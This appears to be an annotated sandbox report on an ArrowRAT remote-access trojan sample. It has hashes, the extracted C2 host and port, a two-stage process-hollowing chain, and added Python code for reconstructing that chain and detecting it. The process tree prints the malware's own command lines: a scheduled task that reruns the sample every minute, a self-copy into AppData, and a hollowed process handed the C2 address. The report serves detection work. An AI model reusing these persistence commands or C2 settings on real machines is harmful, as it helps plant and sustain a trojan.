Analysis
Max time kernel: 148s
Max time network: 150s
Platform: windows7_x64
Resource: win7-20240903-en
Resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
Submitted: 24-09-2024 12:39
Static task: static1
Behavioral task behavioral1: sample jkoi.exe, resource win7-20240903-en
Behavioral task behavioral2: sample jkoi.exe, resource win10v2004-20240802-en
The signatures and process tree on this page are from behavioral1 (windows7_x64).
General
Target: jkoi.exe
Size: 300.0MB
MD5: 135b97e053b660f8e6cacd58965b93cd
SHA1: 828e92ad30ac243ec063252a338519e4429940e3
SHA256: e659861670260fa5252d5315d71466659e321a90a357aa3005304f145c4a2027
SHA512: 6b19d2143f021feeccf5833b57fff55fbae3c72ea0eb480a893b48acd9ce2bdb0c895cd3516133436b4e937f97ee4e42ce58b4aa3729d1f3c29fa837bc19366c
SSDEEP: 12288:VD9TFmMwfrck/YEwEVhftq6rmIGD9P5X5U4LVkYdS7Ffi:KgERVNQ6Fq9hX5U4L94Zi
300.0 MB is far more than a loader with this behaviour needs; padding a binary past the upload limits of scanners and sandboxes is the usual reason for a file this size. All of the cryptographic hashes above cover the padded file, so a re-padded build of the same loader will not match them.
Malware Config
Extracted family: arrowrat
Extracted values:
  Client
  vncnew1984.duckdns.org:1984
  ecZCILAfG
These three values are exactly the arguments the injected RegAsm.exe passes on the hollowed cvtres.exe command line ("Client vncnew1984.duckdns.org 1984 ecZCILAfG", see the process tree), so the configuration can be recovered from process-creation telemetry without unpacking the sample. The C2 host is a duckdns.org dynamic-DNS name; block on the name rather than on whatever address it resolved to during this run.
Signatures

Boot or Logon Autostart Execution: Active Setup (2 TTPs, 1 IoC)
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
  Key created: \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Active Setup\Installed Components (explorer.exe, PID 2424)
  Only the creation of the parent key is recorded, with no StubPath value under it, and the writer is the explorer.exe instance that the injected RegAsm.exe launched. On its own this is weak evidence of persistence; the scheduled task below is the persistence mechanism that is actually installed.

Suspicious use of SetThreadContext (2 IoCs)
  PID 2592 jkoi.exe set thread context of PID 2728 RegAsm.exe (target index 31)
  PID 2728 RegAsm.exe set thread context of PID 2784 cvtres.exe (target index 35)
  Both targets also receive WriteProcessMemory calls from the same parent (see below): write the payload into a freshly created copy of a signed .NET Framework binary, then redirect its primary thread into the payload. That is the process-hollowing pattern, and it runs twice in a row: jkoi.exe hollows RegAsm.exe, and the injected RegAsm.exe in turn hollows cvtres.exe with the RAT client arguments on its command line.

System Location Discovery: System Language Discovery (1 TTP, 7 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by cmd.exe (3 times), schtasks.exe, jkoi.exe, RegAsm.exe and cvtres.exe
  Reading NLS\Language is also part of ordinary locale initialisation, which is why the benign cmd.exe and schtasks.exe children trigger it too; give this signature little weight by itself.

Modifies registry class (5 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU (explorer.exe)
  Set value (data): \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots (explorer.exe)
  Set value (data): \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff (explorer.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_Classes\Local Settings (explorer.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell (explorer.exe)
  These are ShellBag entries, the folder-view state explorer.exe keeps for every window it opens. They show that the explorer.exe spawned by the injected RegAsm.exe opened folder views; they are not a persistence change.

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 844 schtasks.exe
  The command line (see the process tree) registers a task named "Nanias" that runs C:\Users\Admin\AppData\Roaming\kio\kio.exe every minute; kio.exe is the copy of the sample that a sibling cmd.exe places there.

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  PID 2728 RegAsm.exe (4 times)

Suspicious use of AdjustPrivilegeToken (13 IoCs)
  Token: SeDebugPrivilege, PID 2592 jkoi.exe
  Token: SeDebugPrivilege, PID 2728 RegAsm.exe
  Token: SeShutdownPrivilege, PID 2424 explorer.exe (11 times)
  SeDebugPrivilege is enabled by exactly the two processes that inject into others; explorer.exe enabling SeShutdownPrivilege is routine shell behaviour.

Suspicious use of FindShellTrayWindow (26 IoCs)
  PID 2424 explorer.exe (26 times)

Suspicious use of SendNotifyMessage (17 IoCs)
  PID 2424 explorer.exe (17 times)

Suspicious use of SetWindowsHookEx (1 IoC)
  PID 2728 RegAsm.exe
  A Windows hook installed from the injected RegAsm.exe is worth recovering from memory; input capture is a typical use, but the sandbox does not record the hook type.

Suspicious use of WriteProcessMemory (48 IoCs, duplicate rows collapsed)
  source -> target (sandbox target index, number of rows)
  PID 2592 jkoi.exe -> PID 2728 RegAsm.exe (31, x12)
  PID 2728 RegAsm.exe -> PID 2424 explorer.exe (33, x4)
  PID 2728 RegAsm.exe -> PID 2676 cvtres.exe (34, x4)
  PID 2728 RegAsm.exe -> PID 2784 cvtres.exe (35, x9)
  PID 2592 jkoi.exe -> PID 2984 cmd.exe (37, x4)
  PID 2592 jkoi.exe -> PID 2064 cmd.exe (38, x4)
  PID 2592 jkoi.exe -> PID 2684 cmd.exe (39, x4)
  PID 2424 explorer.exe -> PID 1968 ctfmon.exe (41, x3)
  PID 2064 cmd.exe -> PID 844 schtasks.exe (44, x4)
  A parent writing a few blocks into a child it has just created is part of ordinary process start-up, which is why the benign cmd.exe, schtasks.exe and ctfmon.exe spawns appear here with three or four writes each. The rows that matter are the two targets that also appear under SetThreadContext (RegAsm.exe 2728 and cvtres.exe 2784) and, to a lesser degree, cvtres.exe 2676, which was written to but never had its thread context changed and shows no further activity.

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
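As an added example that is not part of the sandbox report, the following Python reconstructs the injection chain from rows shaped like the SetThreadContext and WriteProcessMemory tables above. The input is constructed: the rows from this report re-typed by hand with the duplicates removed. The rule is the one stated above: a pair counts as hollowing only when the same source both wrote into the target and set its thread context, so the parent-to-child writes from ordinary process creation (cmd.exe into schtasks.exe, explorer.exe into ctfmon.exe) are ignored. Function names are this example's own.

```python
import re
from collections import defaultdict

# Constructed input: the SetThreadContext and WriteProcessMemory rows from this
# report, re-typed with the duplicate rows removed. Same row shape as the tables.
SAMPLE_ROWS = """
PID 2592 set thread context of 2728 2592 jkoi.exe 31
PID 2728 set thread context of 2784 2728 RegAsm.exe 35
PID 2592 wrote to memory of 2728 2592 jkoi.exe 31
PID 2728 wrote to memory of 2424 2728 RegAsm.exe 33
PID 2728 wrote to memory of 2676 2728 RegAsm.exe 34
PID 2728 wrote to memory of 2784 2728 RegAsm.exe 35
PID 2592 wrote to memory of 2984 2592 jkoi.exe 37
PID 2592 wrote to memory of 2064 2592 jkoi.exe 38
PID 2592 wrote to memory of 2684 2592 jkoi.exe 39
PID 2424 wrote to memory of 1968 2424 explorer.exe 41
PID 2064 wrote to memory of 844 2064 cmd.exe 44
"""

# "PID <src> <op> <dst> <src again> <src image> <sandbox target index>"
ROW_RE = re.compile(
    r"PID (?P<src>\d+) (?P<op>set thread context of|wrote to memory of) "
    r"(?P<dst>\d+) \d+ (?P<image>\S+) (?P<target>\d+)"
)


def parse_rows(text):
    """Return (src_pid, src_image, op, dst_pid) tuples; op is 'setctx' or 'wpm'."""
    events = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # tolerate headers or wrapped lines
        op = "setctx" if m["op"].startswith("set") else "wpm"
        events.append((int(m["src"]), m["image"], op, int(m["dst"])))
    return events


def hollowing_candidates(events):
    """(src, dst) pairs where src both wrote into dst and set dst's thread context."""
    ops = defaultdict(set)
    for src, _, op, dst in events:
        ops[(src, dst)].add(op)
    return sorted(pair for pair, seen in ops.items() if {"setctx", "wpm"} <= seen)


def injection_chains(events):
    """Follow candidate pairs from processes nobody injected into down to the final host."""
    pairs = hollowing_candidates(events)
    children = defaultdict(list)
    for src, dst in pairs:
        children[src].append(dst)
    roots = {src for src, _ in pairs} - {dst for _, dst in pairs}
    chains = []

    def walk(pid, path):
        if pid not in children:
            chains.append(path)
            return
        for nxt in children[pid]:
            walk(nxt, path + [nxt])

    for root in sorted(roots):
        walk(root, [root])
    return chains


if __name__ == "__main__":
    evs = parse_rows(SAMPLE_ROWS)
    for chain in injection_chains(evs):
        print(" -> ".join(str(p) for p in chain))  # 2592 -> 2728 -> 2784
```

Run against these rows it yields a single chain, jkoi.exe (2592) into RegAsm.exe (2728) into cvtres.exe (2784); cvtres.exe 2676 drops out because it was only written to, and the cmd.exe and schtasks.exe writes drop out for the same reason. The same rule applies to EDR telemetry that exposes WriteProcessMemory and SetThreadContext (or NtSetContextThread) as separate events keyed by source and target process.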
Processes
C:\Users\Admin\AppData\Local\Temp\jkoi.exe (PID 2592)
  command line: "C:\Users\Admin\AppData\Local\Temp\jkoi.exe"
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (PID 2728)
    command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    C:\Windows\explorer.exe (PID 2424)
      command line: "C:\Windows\explorer.exe"
      - Boot or Logon Autostart Execution: Active Setup
      - Modifies registry class
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\ctfmon.exe (PID 1968)
        command line: ctfmon.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 2676)
      command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org 1984 ecZCILAfG
      (no signatures: written to by RegAsm.exe but never given a new thread context)
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 2784)
      command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org 1984 ecZCILAfG
      - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe (PID 2984)
    command line: "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\kio"
    - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe (PID 2064)
    command line: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\kio\kio.exe'" /f
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\schtasks.exe (PID 844)
      command line: schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\kio\kio.exe'" /f
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task
  C:\Windows\SysWOW64\cmd.exe (PID 2684)
    command line: "cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\jkoi.exe" "C:\Users\Admin\AppData\Roaming\kio\kio.exe"
    - System Location Discovery: System Language Discovery
C:\Windows\system32\taskeng.exe (PID 1984)
  command line: taskeng.exe {807E9F0D-21CF-4BA1-90CD-E2CEF0D145AA} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]

Reading the tree: the sample is 32-bit (its children come from SysWOW64 and the 32-bit Framework directory) and starts two activities. The first is the two-stage hollowing, jkoi.exe into RegAsm.exe and RegAsm.exe into cvtres.exe, with the RAT client configuration passed as plain command-line arguments to the hollowed cvtres.exe; the injected RegAsm.exe also launches an explorer.exe, which in turn starts ctfmon.exe. The second is persistence, done with three cmd.exe children: create C:\Users\Admin\AppData\Roaming\kio, register the minute-interval task "Nanias", and copy the sample there as kio.exe. taskeng.exe at the top level is the per-session task engine that appears once a task exists for the user; no kio.exe process shows up within the 148 s run. Neither RegAsm.exe nor cvtres.exe is ever started with arguments a real invocation would have (an assembly path for RegAsm.exe, resource files and switches for cvtres.exe), which is the detection handle.
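Added example, not part of the sandbox report: detection logic for the three command-line handles the tree gives, run over constructed process-creation events. The events are shaped after the tree above (parent image, image, command line) plus two benign controls made up for contrast, an MSBuild-driven cvtres.exe and a daily backup task, to show the rules stay quiet on normal use. Field names, rule names and the benign command lines are this example's own assumptions, not a Sysmon or sandbox schema.

```python
import re

# Constructed process-creation events mirroring the tree in this report, plus two
# made-up benign controls (an MSBuild-driven cvtres.exe and a daily backup task).
# Field names are this example's own, not a sandbox or Sysmon schema.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\Admin\AppData\Local\Temp\jkoi.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'},
    {"parent": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org 1984 ecZCILAfG'},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'''schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'C:\Users\Admin\AppData\Roaming\kio\kio.exe'" /f'''},
    {"parent": r"C:\Users\Admin\AppData\Local\Temp\jkoi.exe",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\jkoi.exe" "C:\Users\Admin\AppData\Roaming\kio\kio.exe"'},
    {"parent": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",  # benign control (made up)
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": r'cvtres.exe /NOLOGO /MACHINE:x86 "/OUT:C:\build\obj\app.res" "C:\build\obj\app.TMP"'},
    {"parent": r"C:\Windows\System32\svchost.exe",  # benign control (made up)
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe" /f'},
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # whitespace split that respects double quotes
HOLLOW_HOSTS = {"regasm.exe", "regsvcs.exe", "cvtres.exe", "installutil.exe"}
FILE_EXTS = (".dll", ".exe", ".res", ".obj", ".tmp", ".rc")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def argv(cmdline):
    # schtasks /tr values arrive as "'...'", so single quotes are stripped as well.
    return [t.strip("\"'") for t in TOKEN_RE.findall(cmdline)]


def rule_dotnet_host_args(ev):
    """Framework tools used as hollowing hosts run with no arguments or with argv that
    is not a file or switch (here: the RAT's host, port and id)."""
    name = basename(ev["image"])
    if name not in HOLLOW_HOSTS:
        return None
    args = argv(ev["cmdline"])[1:]
    if not args:
        return "%s started with no arguments (real invocations need an input file)" % name
    odd = [a for a in args if not a.startswith("/") and not a.lower().endswith(FILE_EXTS)]
    if odd:
        return "%s given non-file arguments %r (possible injected payload argv)" % (name, odd)
    return None


def rule_schtasks_persistence(ev):
    """A /create with a minute-level repeat or an action under the user profile."""
    if basename(ev["image"]) != "schtasks.exe":
        return None
    args = [a.lower() for a in argv(ev["cmdline"])]
    if "/create" not in args:
        return None
    opts = {args[i]: args[i + 1] for i in range(len(args) - 1) if args[i].startswith("/")}
    reasons = []
    if opts.get("/sc") == "minute" and opts.get("/mo", "").isdigit() and int(opts["/mo"]) <= 5:
        reasons.append("runs every %s minute(s)" % opts["/mo"])
    target = opts.get("/tr", "")
    if "\\appdata\\" in target or "\\temp\\" in target:
        reasons.append("task action lives in a user-writable profile path")
    return "; ".join(reasons) or None


def rule_self_copy_to_profile(ev):
    """cmd.exe copying its own parent's image into AppData\\Roaming."""
    if basename(ev["image"]) != "cmd.exe":
        return None
    args = [a.lower() for a in argv(ev["cmdline"])]
    parent = basename(ev["parent"])
    if "copy" in args and any("\\appdata\\roaming\\" in a for a in args):
        if any(a.endswith("\\" + parent) for a in args):
            return "parent %s copies itself into AppData\\Roaming" % parent
    return None


RULES = (rule_dotnet_host_args, rule_schtasks_persistence, rule_self_copy_to_profile)


def scan(events):
    """Return (image, rule name, reason) for every event a rule fires on."""
    findings = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                findings.append((basename(ev["image"]), rule.__name__, reason))
    return findings


if __name__ == "__main__":
    for image, rule, reason in scan(SAMPLE_EVENTS):
        print("%-13s %-28s %s" % (image, rule, reason))
```

The four malicious events each produce one finding and the two controls none. The argument check is deliberately narrow (switches and known file extensions only) because MSBuild-driven cvtres.exe and RegAsm.exe invocations are common on developer machines; tune FILE_EXTS to what your build telemetry actually shows before deploying, and pair the schtasks rule with a watch on the task's action path rather than on the task name, which is attacker-chosen.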
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1): Active Setup (1), T1547.014
  Scheduled Task/Job (1): Scheduled Task (1), T1053.005
Privilege Escalation
  Boot or Logon Autostart Execution (1): Active Setup (1), T1547.014
  Scheduled Task/Job (1): Scheduled Task (1), T1053.005
The matrix on this page lists only the persistence and privilege-escalation techniques; the System Language Discovery signature above maps to T1614.001, and the hollowing of RegAsm.exe and cvtres.exe to T1055.012 (Process Hollowing), which the sandbox reports as raw API signatures rather than as a technique.